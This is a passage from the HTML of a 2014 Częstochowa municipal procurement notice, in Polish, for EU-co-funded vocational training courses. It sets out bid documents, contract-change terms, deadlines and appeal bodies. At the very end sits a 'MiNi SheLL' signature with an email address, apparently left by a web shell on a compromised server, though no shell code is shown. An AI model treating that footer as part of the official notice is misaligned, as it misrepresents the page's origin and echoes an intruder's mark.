3. Inne dokumenty wymagane przez zamawiającego - Wypełniony druk OFERTA, stanowiący załącznik nr 3 do specyfikacji, zawierający oświadczenie, że Wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych, a także informację, czy wykonawca należy/nie należy do grupy kapitałowej. 
Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany umowy:
1. Zamawiający dopuszcza możliwość przesunięcia terminu realizacji zamówienia, poprzez aneks do umowy jeśli wystąpią obiektywne okoliczności niezależne od wykonawcy uniemożliwiające wykonanie usługi i jednocześnie wydłużenia okresu realizacji usługi o czas trwania tych okoliczności, w zakresie wszystkich części.
2. Zamawiający zastrzega sobie, w granicach 50 %:
a) możliwość zmniejszenia lub zwiększenia liczby uczestników kursu.
b) możliwość wymiany poszczególnych uczestników/uczestniczek kursu przed ich rozpoczęciem (np. w wyniku niemożliwości uczestnictwa w kursie).
c) możliwość zmiany podziału grup uczestników/uczestniczek kursu.
3. Istnieje możliwość dokonania zmiany lub zwiększenia ilości osób przewidzianych do wykonania zamówienia, przedstawionych w ofercie przetargowej Wykonawcy, za uprzednią pisemną zgodą Zamawiającego. W przypadku zmiany lub zwiększenia ilości osób, o których mowa w ust. 1 paragrafu 6 umowy, nowa osoba
musi spełniać co najmniej wymagania określone w specyfikacji istotnych warunków zamówienia dla tej osoby.
Zamawiający może także zażądać od Wykonawcy zmiany osoby, o której mowa w ust. 1 paragrafu 6 umowy, jeżeli uzna, że nie wykonuje należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tej osoby w terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zamawiającemu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.czestochowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> adres e-mail: mkaminska@czestochowa.um.gov.pl
Wydział Inwestycji i Zamówień Publicznych Urzędu Miasta Częstochowy, ul. Śląska 11/13, 42-217 Częstochowa, pokój 418, 4 piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2014 godzina 09:30, miejsce: Biuro Obsługi Interesanta stanowisko Wydziału Nadzoru i Administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet IX - Rozwój kompetencji i wykształcenia w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013 w ramach projektu pn.: Mam zawód - mam pracę w regionie. 
2. Otwarcie ofert nastąpi w dniu 10.10.2014 r. o godz. 10:00 w sali 418, 4 piętro w siedzibie zamawiającego.
3. Procedury odwoławcze:
3.1. Organ odpowiedzialny za procedury odwoławcze: Oficjalna nazwa: Krajowa Izba Odwoławcza przy Prezesie Urzędu Zamówień Publicznych
Adres pocztowy: ul. Postępu 17A, Miejscowość: Warszawa Kod pocztowy: 02-676 Państwo: Polska (PL)
3.2. Składanie odwołań: 
W prowadzonym postępowaniu mają zastosowanie przepisy zawarte w dziale VI ustawy Prawo zamówień publicznych - Środki ochrony prawnej.
W odniesieniu do odwołań zastosowanie mają także następujące przepisy wykonawcze do ustawy Prawo zamówień publicznych:
a) Rozporządzenie Prezesa Rady Ministrów z dnia 22 marca 2010 r. w sprawie regulaminu postępowania przy rozpoznawaniu odwołań (j.t. Dz. U.z 2014 r., poz. 964);
b) Rozporządzenie Prezesa Rady Ministrów z dnia 15 marca 2010 r. w sprawie wysokości oraz sposobu pobierania wpisu od odwołania oraz rodzajów kosztów w postępowaniu odwoławczym i sposobu ich rozliczania (Dz. U. Nr 41, poz. 238)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com